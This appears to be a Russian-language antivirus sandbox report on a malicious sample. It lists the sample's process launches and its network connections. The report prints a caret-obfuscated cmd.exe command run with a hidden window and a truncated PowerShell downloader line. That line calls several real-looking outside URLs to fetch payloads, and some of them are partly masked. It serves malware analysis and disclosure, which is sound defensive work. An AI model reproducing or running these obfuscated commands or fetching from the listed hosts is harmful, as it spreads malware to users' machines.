Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cmd.exe, ,,,/V,,,,/C",,(,,,(se^t p^zl^8=^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^}}^{hctac}}kaerb^;RO^L$^ ^ss^ec^or^P-^trat^S;^)R^OL$^(el^i^f^oteva^s^.JB^S^$;^)ydoB^e^sn^op^ser^.CPv^$^(e^t^irw...
Сетевая активность
Подключается к
- '42####ductnews.com':80
- 'ca##.2d73.ru':80
- 'ma####nilife.com':80
- 'ar####erlist.com':80
TCP
Запросы HTTP GET
- http://42####ductnews.com/w
- http://ca##.2d73.ru/VKD1Idvq
- http://ma####nilife.com/Qppyh
- http://ar####erlist.com/z9RY
UDP
- DNS ASK 42####ductnews.com
- DNS ASK js###venews.com
- DNS ASK ca##.2d73.ru
- DNS ASK ma####nilife.com
- DNS ASK ar####erlist.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cmd.exe, ,,,/V,,,,/C",,(,,,(se^t p^zl^8=^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^}}^{hctac}}kaerb^;RO^L$^ ^ss^ec^or^P-^trat^S;^)R^OL$^(el^i^f^oteva^s^.JB^S^$;^)ydoB^e^sn^op^ser^.CPv^$^(e^t^irw...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' , ,,,/V,,,,/C",,(,,,(se^t p^zl^8=^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^}}^{hctac}}kaerb^;RO^L$^ ^ss^ec^or^P-^trat^S;^)R^OL$^(el^i^f^oteva^s^.JB^S^$;^)ydoB^e^sn^op^ser^.CPv^$^(e^t^irw^.JB^S$;1^ ^=^ ^e^p^y...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $OcN='SRG';$aTi='http://42####ductnews.com/w@http://jsplivenews.com/0OcPNLEV@http://cach.2d73.ru/VKD1Idvq@http://maximinilife.com/Qppyh@http://artpowerlist.com/z9RY'.Split('@');$LOR=([System.IO...
